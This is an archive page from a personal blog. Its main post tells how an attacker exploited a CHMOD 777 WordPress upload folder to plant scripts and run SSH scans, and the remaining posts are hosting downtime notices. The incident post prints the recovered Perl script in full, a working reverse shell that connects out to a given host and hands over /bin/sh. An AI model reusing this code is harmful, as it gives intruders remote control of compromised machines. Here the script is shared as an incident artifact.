h4x3d.com

- h4x3d.com

Archive
Tag "downtime"

Latest downtime due to CHMOD 777 insecurity

By: jez
02-03-2009
unsorted
0 comments

exploit, random image however

Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.

Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Read More

VPS changes September 2007

By: jez
20-09-2007
Noteworthy
0 comments

Just wanted everyone to know that this (and other sites) are going to be transfered to a new VPS internally at zone.net.
More news to come soon. Please be aware that comments might get lost due to unsynchronized databases.
Sorry for any inconvenience!

zone.net

Read More

Urgent notice: 2 hour downtime 15th September

By: jez
15-09-2007
Dailies
0 comments

Just wanted everyone to know that this (and other sites) are going to be put in maintenance mode for two hours (2).
After that everything should be back up and working just fine. Europe: 01.00 to 03.00 (add one hour for UK), USA: (West Coast) 16.00 to 18.00, (East Coast) 19.00 to 21.00.

Sorry for any inconvenience!

Read More

Urm… Great

By: jez
06-05-2007
asides
8 comments

Dear Visitors to h4x3d.com,
sorry for the downtime over the past 24 hours. My websites got moved over to a new server and somehow some screws got loose. You may find some links/images/files not yet working, but I am sure the guys over at dreamhost are doing their best to sort this mess out.

We are now on nehi server and no longer on the laggy clamato. Thanks to the great time-off my advertisement earnings have been massive: 0,78 cent in 24 hours. Awesome!

UPDATE

Seems like they (dreamhost.com) found out what was the loose screw:


I apologize for the inconvenience this has caused you.	It appears there
was an issue with DNS, and our servers were still pointing to the old
webserver, instead of the new one you were moved to.

I have manually pushed the DNS for all your domains, but it will still
take up to 24 hours for your sites to be fully working.  Some of your
sites may have already propagated, but some will still display the
'bad_httpd_conf" error.

If you continue to experience problems after 24 hours, let me know!  You
can email me directly at (name deleted)@dreamhost.com, or simply reply to this
ticket.

Thanks!

(name deleted)
Read More

From the newsstand

After a recent breach in first layer security I wiped the domain to be safe and restored to a clean working copy. It will take some weeks to seed out the nasty bits and pieces that lead to this situation. Please bare with this not too bad 'default' theme in the meantime (I am on holiday till Mid July). Best, jz.

Recent entries

Categories

Recent comments

© 2011 h4x3d.com.

2,251 comments on this temporary theme for two weeks | thanks.